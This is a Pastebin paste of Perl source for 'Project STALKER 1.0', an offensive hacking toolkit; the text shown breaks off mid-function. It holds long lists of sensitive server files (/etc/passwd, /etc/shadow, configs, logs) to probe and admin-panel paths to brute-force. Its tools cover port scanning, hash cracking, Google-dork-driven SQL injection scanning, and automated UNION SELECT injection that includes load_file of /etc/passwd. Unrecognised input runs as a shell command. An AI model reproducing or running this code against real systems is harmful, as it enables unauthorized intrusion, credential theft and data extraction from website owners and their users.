Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!usr/bin/perl
- #Project STALKER 1.0
- #(C) Doddy Hackman 2012
- #
- #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
- #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
- #http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
- use IO::Socket;
- use HTML::LinkExtor;
- use LWP::UserAgent;
- use Win32; ## Comment this line for Linux
- use Win32::OLE qw(in); ## Comment this line for Linux
- use Win32::Process; ## Comment this line for Linux
- use Net::FTP;
- use Cwd;
- use URI::Split qw(uri_split);
- use MIME::Base64;
- use DBI; ## Comment this line for Linux
- use URI::Escape;
- use Color::Output;
- Color::Output::Init
- my @files = (
- 'C:/xampp/htdocs/aca.txt',
- 'C:/xampp/htdocs/aca.txt',
- 'C:/xampp/htdocs/admin.php',
- 'C:/xampp/htdocs/leer.txt',
- '../../../boot.ini',
- '../../../../boot.ini',
- '../../../../../boot.ini',
- '../../../../../../boot.ini',
- '/etc/passwd',
- '/etc/shadow',
- '/etc/shadow~',
- '/etc/hosts',
- '/etc/motd',
- '/etc/apache/apache.conf',
- '/etc/fstab',
- '/etc/apache2/apache2.conf',
- '/etc/apache/httpd.conf',
- '/etc/httpd/conf/httpd.conf',
- '/etc/apache2/httpd.conf',
- '/etc/apache2/sites-available/default',
- '/etc/mysql/my.cnf',
- '/etc/my.cnf',
- '/etc/sysconfig/network-scripts/ifcfg-eth0',
- '/etc/redhat-release',
- '/etc/httpd/conf.d/php.conf',
- '/etc/pam.d/proftpd',
- '/etc/phpmyadmin/config.inc.php',
- '/var/www/config.php',
- '/etc/httpd/logs/error_log',
- '/etc/httpd/logs/error.log',
- '/etc/httpd/logs/access_log',
- '/etc/httpd/logs/access.log',
- '/var/log/apache/error_log',
- '/var/log/apache/error.log',
- '/var/log/apache/access_log',
- '/var/log/apache/access.log',
- '/var/log/apache2/error_log',
- '/var/log/apache2/error.log',
- '/var/log/apache2/access_log',
- '/var/log/apache2/access.log',
- '/var/www/logs/error_log',
- '/var/www/logs/error.log',
- '/var/www/logs/access_log',
- '/var/www/logs/access.log',
- '/usr/local/apache/logs/error_log',
- '/usr/local/apache/logs/error.log',
- '/usr/local/apache/logs/access_log',
- '/usr/local/apache/logs/access.log',
- '/var/log/error_log',
- '/var/log/error.log',
- '/var/log/access_log',
- '/var/log/access.log',
- '/etc/group',
- '/etc/security/group',
- '/etc/security/passwd',
- '/etc/security/user',
- '/etc/security/environ',
- '/etc/security/limits',
- '/usr/lib/security/mkuser.default',
- '/apache/logs/access.log',
- '/apache/logs/error.log',
- '/etc/httpd/logs/acces_log',
- '/etc/httpd/logs/acces.log',
- '/var/log/httpd/access_log',
- '/var/log/httpd/error_log',
- '/apache2/logs/error.log',
- '/apache2/logs/access.log',
- '/logs/error.log',
- '/logs/access.log',
- '/usr/local/apache2/logs/access_log',
- '/usr/local/apache2/logs/access.log',
- '/usr/local/apache2/logs/error_log',
- '/usr/local/apache2/logs/error.log',
- '/var/log/httpd/access.log',
- '/var/log/httpd/error.log',
- '/opt/lampp/logs/access_log',
- '/opt/lampp/logs/error_log',
- '/opt/xampp/logs/access_log',
- '/opt/xampp/logs/error_log',
- '/opt/lampp/logs/access.log',
- '/opt/lampp/logs/error.log',
- '/opt/xampp/logs/access.log',
- '/opt/xampp/logs/error.log',
- 'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
- 'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
- '/usr/local/apache/conf/httpd.conf',
- '/usr/local/apache2/conf/httpd.conf',
- '/etc/apache/conf/httpd.conf',
- '/usr/local/etc/apache/conf/httpd.conf',
- '/usr/local/apache/httpd.conf',
- '/usr/local/apache2/httpd.conf',
- '/usr/local/httpd/conf/httpd.conf',
- '/usr/local/etc/apache2/conf/httpd.conf',
- '/usr/local/etc/httpd/conf/httpd.conf',
- '/usr/apache2/conf/httpd.conf',
- '/usr/apache/conf/httpd.conf',
- '/usr/local/apps/apache2/conf/httpd.conf',
- '/usr/local/apps/apache/conf/httpd.conf',
- '/etc/apache2/conf/httpd.conf',
- '/etc/http/conf/httpd.conf',
- '/etc/httpd/httpd.conf',
- '/etc/http/httpd.conf',
- '/etc/httpd.conf',
- '/opt/apache/conf/httpd.conf',
- '/opt/apache2/conf/httpd.conf',
- '/var/www/conf/httpd.conf',
- '/private/etc/httpd/httpd.conf',
- '/private/etc/httpd/httpd.conf.default',
- '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
- '/Volumes/webBackup/private/etc/httpd/httpd.conf',
- '/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
- 'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf',
- 'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf',
- 'C:\ProgramFiles\xampp\apache\conf\httpd.conf',
- '/usr/local/php/httpd.conf.php',
- '/usr/local/php4/httpd.conf.php',
- '/usr/local/php5/httpd.conf.php',
- '/usr/local/php/httpd.conf',
- '/usr/local/php4/httpd.conf',
- '/usr/local/php5/httpd.conf',
- '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
- '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
- '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
- '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
- '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
- '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
- '/usr/local/etc/apache/vhosts.conf',
- '/etc/php.ini',
- '/bin/php.ini',
- '/etc/httpd/php.ini',
- '/usr/lib/php.ini',
- '/usr/lib/php/php.ini',
- '/usr/local/etc/php.ini',
- '/usr/local/lib/php.ini',
- '/usr/local/php/lib/php.ini',
- '/usr/local/php4/lib/php.ini',
- '/usr/local/php5/lib/php.ini',
- '/usr/local/apache/conf/php.ini',
- '/etc/php4.4/fcgi/php.ini',
- '/etc/php4/apache/php.ini',
- '/etc/php4/apache2/php.ini',
- '/etc/php5/apache/php.ini',
- '/etc/php5/apache2/php.ini',
- '/etc/php/php.ini',
- '/etc/php/php4/php.ini',
- '/etc/php/apache/php.ini',
- '/etc/php/apache2/php.ini',
- '/web/conf/php.ini',
- '/usr/local/Zend/etc/php.ini',
- '/opt/xampp/etc/php.ini',
- '/var/local/www/conf/php.ini',
- '/etc/php/cgi/php.ini',
- '/etc/php4/cgi/php.ini',
- '/etc/php5/cgi/php.ini',
- 'c:\php5\php.ini',
- 'c:\php4\php.ini',
- 'c:\php\php.ini',
- 'c:\PHP\php.ini',
- 'c:\WINDOWS\php.ini',
- 'c:\WINNT\php.ini',
- 'c:\apache\php\php.ini',
- 'c:\xampp\apache\bin\php.ini',
- 'c:\NetServer\bin\stable\apache\php.ini',
- 'c:\home2\bin\stable\apache\php.ini',
- 'c:\home\bin\stable\apache\php.ini',
- '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
- '/usr/local/cpanel/logs',
- '/usr/local/cpanel/logs/stats_log',
- '/usr/local/cpanel/logs/access_log',
- '/usr/local/cpanel/logs/error_log',
- '/usr/local/cpanel/logs/license_log',
- '/usr/local/cpanel/logs/login_log',
- '/var/cpanel/cpanel.config',
- '/var/log/mysql/mysql-bin.log',
- '/var/log/mysql.log',
- '/var/log/mysqlderror.log',
- '/var/log/mysql/mysql.log',
- '/var/log/mysql/mysql-slow.log',
- '/var/mysql.log',
- '/var/lib/mysql/my.cnf',
- 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err',
- 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log',
- 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err',
- 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log',
- 'C:\ProgramFiles\MySQL\data\hostname.err',
- 'C:\ProgramFiles\MySQL\data\mysql.log',
- 'C:\ProgramFiles\MySQL\data\mysql.err',
- 'C:\ProgramFiles\MySQL\data\mysql-bin.log',
- 'C:\MySQL\data\hostname.err',
- 'C:\MySQL\data\mysql.log',
- 'C:\MySQL\data\mysql.err',
- 'C:\MySQL\data\mysql-bin.log',
- 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini',
- 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf',
- 'C:\ProgramFiles\MySQL\my.ini',
- 'C:\ProgramFiles\MySQL\my.cnf',
- 'C:\MySQL\my.ini',
- 'C:\MySQL\my.cnf',
- '/etc/logrotate.d/proftpd',
- '/www/logs/proftpd.system.log',
- '/var/log/proftpd',
- '/etc/proftp.conf',
- '/etc/protpd/proftpd.conf',
- '/etc/vhcs2/proftpd/proftpd.conf',
- '/etc/proftpd/modules.conf',
- '/var/log/vsftpd.log',
- '/etc/vsftpd.chroot_list',
- '/etc/logrotate.d/vsftpd.log',
- '/etc/vsftpd/vsftpd.conf',
- '/etc/vsftpd.conf',
- '/etc/chrootUsers',
- '/var/log/xferlog',
- '/var/adm/log/xferlog',
- '/etc/wu-ftpd/ftpaccess',
- '/etc/wu-ftpd/ftphosts',
- '/etc/wu-ftpd/ftpusers',
- '/usr/sbin/pure-config.pl',
- '/usr/etc/pure-ftpd.conf',
- '/etc/pure-ftpd/pure-ftpd.conf',
- '/usr/local/etc/pure-ftpd.conf',
- '/usr/local/etc/pureftpd.pdb',
- '/usr/local/pureftpd/etc/pureftpd.pdb',
- '/usr/local/pureftpd/sbin/pure-config.pl',
- '/usr/local/pureftpd/etc/pure-ftpd.conf',
- '/etc/pure-ftpd/pure-ftpd.pdb',
- '/etc/pureftpd.pdb',
- '/etc/pureftpd.passwd',
- '/etc/pure-ftpd/pureftpd.pdb',
- '/var/log/pure-ftpd/pure-ftpd.log',
- '/logs/pure-ftpd.log',
- '/var/log/pureftpd.log',
- '/var/log/ftp-proxy/ftp-proxy.log',
- '/var/log/ftp-proxy',
- '/var/log/ftplog',
- '/etc/logrotate.d/ftp',
- '/etc/ftpchroot',
- '/etc/ftphosts',
- '/var/log/exim_mainlog',
- '/var/log/exim/mainlog',
- '/var/log/maillog',
- '/var/log/exim_paniclog',
- '/var/log/exim/paniclog',
- '/var/log/exim/rejectlog',
- '/var/log/exim_rejectlog'
- );
- @panels = (
- 'admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx'
- , 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp',
- 'admin/webmaster.aspx'
- , 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
- 'asp/admin/admin.aspx'
- , 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/',
- 'login.asp', 'login.aspx'
- , 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
- 'login/index.asp', 'login/index.aspx'
- , 'login/login.asp', 'login/login.aspx', 'login/admin.asp',
- 'login/admin.aspx'
- , 'administracion/index.asp', 'administracion/index.aspx',
- 'administracion/login.asp'
- , 'administracion/login.aspx', 'administracion/webmaster.asp',
- 'administracion/webmaster.aspx'
- , 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
- 'admin/admin.php'
- , 'admin/index.php', 'admin/login.php', 'admin/system.php',
- 'admin/ingresar.php'
- , 'admin/administrador.php', 'admin/default.php', 'administracion/',
- 'administracion/index.php'
- , 'administracion/login.php', 'administracion/ingresar.php',
- 'administracion/admin.php'
- , 'administration/', 'administration/index.php', 'administration/login.php'
- , 'administrator/index.php', 'administrator/login.php',
- 'administrator/system.php', 'system/'
- , 'system/login.php', 'admin.php', 'login.php', 'administrador.php',
- 'administration.php'
- , 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php',
- 'admin2.html', 'yonetim.php'
- , 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/',
- 'admin/account.php', 'admin/account.html'
- , 'admin/index.html', 'admin/login.html', 'admin/home.php',
- 'admin/controlpanel.html'
- , 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html',
- 'cp.php', 'cp.html'
- , 'administrator/', 'administrator/index.html', 'administrator/login.html'
- , 'administrator/account.html', 'administrator/account.php',
- 'administrator.html', 'login.html'
- , 'modelsearch/login.php', 'moderator.php', 'moderator.html',
- 'moderator/login.php'
- , 'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
- 'moderator/'
- , 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php',
- 'controlpanel.html'
- , 'admincontrol.php', 'admincontrol.html', 'adminpanel.php',
- 'adminpanel.html', 'admin1.asp'
- , 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
- 'admin/home.asp'
- , 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
- 'administrator/index.asp'
- , 'administrator/login.asp', 'administrator/account.asp',
- 'administrator.asp'
- , 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp',
- 'moderator/admin.asp'
- , 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
- 'fileadmin/'
- , 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html',
- 'sysadmin.php'
- , 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/',
- 'ur-admin.asp'
- , 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html'
- , 'Server.asp', 'Server/', 'wp-admin/', 'administr8.php', 'administr8.html'
- , 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php',
- 'webadmin.asp'
- , 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp'
- , 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/'
- , 'useradmin/', 'sysadmins/', 'admin1/', 'system-administration/',
- 'administrators/'
- , 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/',
- 'SysAdmin/'
- , 'administer/', 'LiveUser_Admin/', 'sys-admin/', 'typo3/', 'panel/',
- 'cpanel/'
- , 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/',
- 'formslogin/
- ', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/
- ', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
- 'login-redirect/
- ', 'sub-login/', 'wp-login/', 'login1/', 'dir-login/', 'login_db/', 'xlogin/',
- 'smblogin/
- ', 'customer_login/', 'UserLogin/', 'login-us/', 'acct_login/', 'admin_area/',
- 'bigadmin/'
- , 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sql-admin/', 'radmind/',
- 'openvpnadmin/'
- , 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
- 'newsadmin/', 'adminpro/'
- , 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/',
- 'ccp14admin/'
- , 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/'
- , 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind-1/'
- , 'Super-Admin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/'
- , 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
- 'logo_sysadmin/'
- , 'server/', 'database_administration/', 'power_user/',
- 'system_administration/'
- , 'ss_vms_admin_sm/'
- );
- unless ( -d "/logs/webs" ) {
- mkdir( "logs/", 777 );
- mkdir( "logs/webs/", 777 );
- }
- my $nave = LWP::UserAgent->new;
- $nave->agent(
- "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
- );
- $nave->timeout(5);
- head();
- getinfo(); ## Comment this line for Linux
- $SIG{INT} = \&next; ## Comment on this line to compile to exe
- while (1) {
- menujo();
- }
- sub getinfo {
- $so = Win32::GetOSName();
- $login = Win32::LoginName();
- $domain = Win32::DomainName();
- cprint "\x0313"; #13
- print "\n\n[OS] : $so [Login] : $login [Group] : $domain\n\n";
- cprint "\x030";
- }
- sub menujo {
- print "\n\n";
- cprint "\x035r00t\x030"; #13
- cprint "\x033 ~ # \x030"; #13
- cprint "\x037";
- chomp( my $cmd = <stdin> );
- print "\n\n";
- ###############################################################################
- if ( $cmd eq "cmd_getinfo" ) {
- getinfo();
- }
- elsif ( $cmd =~ /cmd_getip(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_getip <host>\n";
- }
- else {
- print "\n[IP] : " . getip($te) . "\n";
- print "\n";
- }
- }
- elsif ( $cmd =~ /cmd_whois(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_whois <host>\n";
- }
- else {
- print "[+] Getting data\n\n";
- print whois($te);
- print "\n\n";
- }
- }
- elsif ( $cmd =~ /cmd_locate(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_locate <host>\n";
- }
- else {
- infocon($te);
- print "\n\n";
- }
- }
- elsif ( $cmd =~ /cmd_getlinks(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_getlinks <page>\n";
- }
- else {
- print "[+] Extracting links in the page\n\n\n";
- $code = toma($te);
- my @re = get_links($code);
- for my $url (@re) {
- print "[Link] : $url\n";
- }
- print "\n\n[+] Finish\n";
- }
- }
- elsif ( $cmd eq "cmd_help" ) {
- helpme();
- }
- elsif ( $cmd eq "cmd_getprocess" ) {
- my %re = getprocess();
- for my $data ( keys %re ) {
- ( $proceso, $pid ) = ( $t =~ /(.*):(.*)/ig );
- print "[+] Proceso : " . $data . "\n";
- print "[+] PID : " . $re{$data} . "\n\n";
- }
- }
- elsif ( $cmd =~ /cmd_killprocess(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_killprocess <pid>\n";
- }
- else {
- if ( killprocess($te) ) {
- print "[+] Process closed\n";
- }
- }
- }
- elsif ( $cmd =~ /cmd_conec(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_conec <host> <port> <command>\n";
- }
- else {
- if ( $cmd =~ /cmd_conec (.*) (.*) (.*)/ ) {
- my ( $a, $b, $c ) = ( $1, $2, $3 );
- print conectar( $a, $b, $c );
- }
- }
- }
- elsif ( $cmd =~ /cmd_allow(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_allow <host>\n";
- }
- else {
- $re = conectar( $te, "80", "GET / HTTP/1.0\r\n" );
- if ( $re =~ /Allow:(.*)/ig ) {
- print "[+] Allow : " . $1 . "\n";
- }
- else {
- print "\n[-] Not Found\n";
- }
- }
- }
- elsif ( $cmd =~ /cmd_paths(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_paths <page>\n";
- }
- else {
- scanpaths($te);
- }
- }
- elsif ( $cmd =~ /cmd_encodehex(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_encodehex <text>\n";
- }
- else {
- print "\n\n[+] " . hex_en($te) . "\n\n";
- }
- }
- elsif ( $cmd =~ /cmd_decodehex(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_decodehex <text>\n";
- }
- else {
- print "\n\n[+] " . hex_de($te) . "\n\n";
- }
- }
- elsif ( $cmd =~ /cmd_download(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_download <url>\n";
- }
- else {
- my $file = $te;
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($te);
- if ( $path =~ /(.*)\/(.*)$/ ) {
- my $file = $2;
- print "[+] Downloading ...\n";
- if ( download( $te, $file ) ) {
- print "[+] File downloaded\n";
- }
- }
- }
- }
- elsif ( $cmd =~ /cmd_encodeascii(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_encodeascii <text>\n";
- }
- else {
- print "\n\n[+] " . ascii($te) . "\n\n";
- }
- }
- elsif ( $cmd =~ /cmd_decodeascii(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_decodeascii <text>\n";
- }
- else {
- print "\n\n[+] " . ascii_de($te) . "\n\n";
- }
- }
- elsif ( $cmd =~ /cmd_encodebase(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_encodebase <text>\n";
- }
- else {
- print "\n\n[+] " . base($te) . "\n\n";
- }
- }
- elsif ( $cmd =~ /cmd_decodebase(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_decodebase <text>\n";
- }
- else {
- print "\n\n[+] " . base_de($te) . "\n\n";
- }
- }
- elsif ( $cmd eq "cmd_aboutme" ) {
- aboutme();
- }
- elsif ( $cmd =~ /cmd_scanport(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_scanport <host>\n";
- }
- else {
- scanport($te);
- }
- }
- elsif ( $cmd =~ /cmd_panel(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_panel <web>\n";
- }
- else {
- scanpanel($te);
- }
- }
- elsif ( $cmd =~ /cmd_scangoogle/ ) {
- print "[Dork] : ";
- chomp( my $dork = <stdin> );
- print "\n\n[Pages] : ";
- chomp( my $pages = <stdin> );
- print "\n\n[Starting the search]\n\n";
- my @links = google( $dork, $pages );
- print "\n[Links Found] : " . int(@links) . "\n\n\n";
- print "[Starting the scan]\n\n\n";
- for my $link (@links) {
- if ( $link =~ /(.*)=/ig ) {
- my $web = $1;
- sql( $web . "=" );
- }
- }
- print "\n\n[+] Finish\n";
- }
- elsif ( $cmd =~ /cmd_getpass(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_getpass <hash>\n";
- }
- else {
- my $ha = $te;
- if ( ver_length($ha) ) {
- print "[+] Cracking Hash...\n";
- my $re = crackit($ha);
- unless ( $re =~ /false01/ ) {
- print "\n\n[+] Cracked : $re\n\n";
- saveyes( "logs/hashes-found.txt", $ha . ":" . $re );
- }
- else {
- print "\n[-] Not Found\n\n";
- }
- }
- else {
- print "\n\n[-] Hash invalid\n\n";
- }
- }
- }
- elsif ( $cmd =~ /cmd_ftp(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_ftp <host> <user> <pass>\n";
- }
- else {
- if ( $cmd =~ /cmd_ftp (.*) (.*) (.*)/ ) {
- ftp( $1, $2, $3 );
- }
- }
- }
- elsif ( $cmd eq "cmd_navegator" ) {
- nave:
- print getcwd() . ">";
- chomp( my $rta = <stdin> );
- print "\n\n";
- if ( $rta =~ /list/ ) {
- my @files = coleccionar( getcwd() );
- for (@files) {
- if ( -f $_ ) {
- print "[File] : " . $_ . "\n";
- }
- else {
- print "[Directory] : " . $_ . "\n";
- }
- }
- }
- if ( $rta =~ /cd (.*)/ ) {
- my $dir = $1;
- if ( chdir($dir) ) {
- print "\n[+] Directory changed\n";
- }
- else {
- print "\n[-] Error\n";
- }
- }
- if ( $rta =~ /del (.*)/ ) {
- my $file = getcwd() . "/" . $1;
- if ( -f $file ) {
- if ( unlink($file) ) {
- print "\n[+] File Deleted\n";
- }
- else {
- print "\n[-] Error\n";
- }
- }
- else {
- if ( rmdir($file) ) {
- print "\n[+] Directory Deleted\n";
- }
- else {
- print "\n[-] Error\n";
- }
- }
- }
- if ( $rta =~ /rename (.*) (.*)/ ) {
- if ( rename( getcwd() . "/" . $1, getcwd() . "/" . $2 ) ) {
- print "\n[+] File Changed\n";
- }
- else {
- print "\n[-] Error\n";
- }
- }
- if ( $rta =~ /open (.*)/ ) {
- my $file = $1;
- chomp $file;
- system($file);
- #system(getcwd()."/".$file);
- }
- if ( $rta eq "help" ) {
- print "\nCommands :
- help
- cd <dir>
- list
- del <del>
- rename <file1> <file2>
- open <file>
- exit
- \n\n";
- }
- if ( $rta eq "exit" ) {
- next;
- }
- print "\n\n";
- goto nave;
- }
- elsif ( $cmd =~ /cmd_kobra(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_kobra <page>\n";
- }
- else {
- my $url = $te;
- chomp $url;
- scansqli( $url, "--" );
- }
- }
- elsif ( $cmd =~ /cmd_mysql(.*)/ ) {
- my $te = $1;
- $te =~ s/ //;
- if ( $te eq "" or $te eq " " ) {
- print "\n[+] sintax : cmd_mysql <host> <user> <pass>\n";
- }
- else {
- if ( $cmd =~ /cmd_mysql (.*) (.*) (.*)/ ) {
- enter( $1, $2, $3 );
- }
- }
- }
- elsif ( $cmd eq "cmd_exit" ) {
- copyright();
- <stdin>;
- exit(1);
- }
- else {
- system($cmd);
- }
- cprint "\x030";
- #####################################################################################
- }
- sub scansqli {
- my $page = $_[0];
- print "[Status] : Scanning.....\n";
- ( $pass1, $bypass2 ) = &bypass( $_[1] );
- my $save = partimealmedio( $_[0] );
- if ( $_[0] =~ /hackman/ig ) {
- savefile( $save . ".txt", "\n[Target Confirmed] : $_[0]\n" );
- &menu_options( $_[0], $pass, $save );
- }
- else {
- my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
- my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
- unless ( $testar1 eq $testar2 ) {
- motor( $page, $_[1] );
- }
- else {
- print "\n[-] Not vulnerable\n\n";
- print "[+] Scan anyway y/n : ";
- chomp( my $op = <stdin> );
- if ( $op eq "y" ) {
- motor( $page, $_[1] );
- }
- else {
- #head();
- #menu();
- }
- }
- }
- }
- sub motor {
- my ( $gen, $save, $control ) = &length( $_[0], $_[1] );
- if ( $control eq 1 ) {
- print "[Status] : Enjoy the menu\n\n";
- &menu_options( $gen, $pass, $save );
- }
- else {
- print "[Status] : Length columns not found\n\n";
- }
- }
- sub length {
- print "\n[+] Looking for the number of columns\n\n";
- my $rows = "0";
- my $asc;
- my $page = $_[0];
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
- $total = "1";
- for my $rows ( 2 .. 200 ) {
- $asc .=
- "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
- $total .= "," . $rows;
- $injection =
- $page . "1"
- . $pass1 . "and"
- . $pass1 . "1=0"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1
- . $alert
- . $asc;
- $test = toma($injection);
- if ( $test =~ /RATSXPDOWN/ ) {
- @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
- $control = 1;
- my $save = partimealmedio( $_[0] );
- savefile( $save . ".txt", "\n[Target confirmed] : $page" );
- savefile( $save . ".txt", "[Bypass] : $_[1]\n" );
- savefile( $save . ".txt", "[Limit] : The site has $rows columns" );
- savefile( $save . ".txt",
- "[Data] : The number @number print data" );
- $total =~ s/$number[0]/hackman/;
- savefile(
- $save . ".txt",
- "[SQLI] : "
- . $page . "1"
- . $pass1 . "and"
- . $pass1 . "1=0"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1
- . $total
- );
- return (
- $page . "1"
- . $pass1 . "and"
- . $pass1 . "1=0"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1
- . $total,
- $save, $control
- );
- }
- }
- }
- sub details {
- my ( $page, $bypass, $save ) = @_;
- ( $pass1, $pass2 ) = &bypass($bypass);
- savefile( $save . ".txt", "\n" );
- if ( $page =~ /(.*)hackman(.*)/ig ) {
- print "\n[+] Searching information..\n\n";
- my ( $start, $end ) = ( $1, $2 );
- $inforschema =
- $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
- . $end
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass2;
- $mysqluser =
- $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
- . $end
- . $pass1 . "from"
- . $pass1
- . "mysql.user"
- . $pass2;
- $test3 =
- toma( $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
- . $end
- . $pass2 );
- $test1 = toma($inforschema);
- $test2 = toma($mysqluser);
- if ( $test2 =~ /ERTOR854/ig ) {
- savefile( $save . ".txt", "[mysql.user] : ON" );
- print "[mysql.user] : ON\n";
- }
- else {
- print "[mysql.user] : OFF\n";
- savefile( $save . ".txt", "[mysql.user] : OFF" );
- }
- if ( $test1 =~ /ERTOR854/ig ) {
- print "[information_schema.tables] : ON\n";
- savefile( $save . ".txt", "[information_schema.tables] : ON" );
- }
- else {
- print "[information_schema.tables] : OFF\n";
- savefile( $save . ".txt", "[information_schema.tables] : OFF" );
- }
- if ( $test3 =~ /ERTOR854/ig ) {
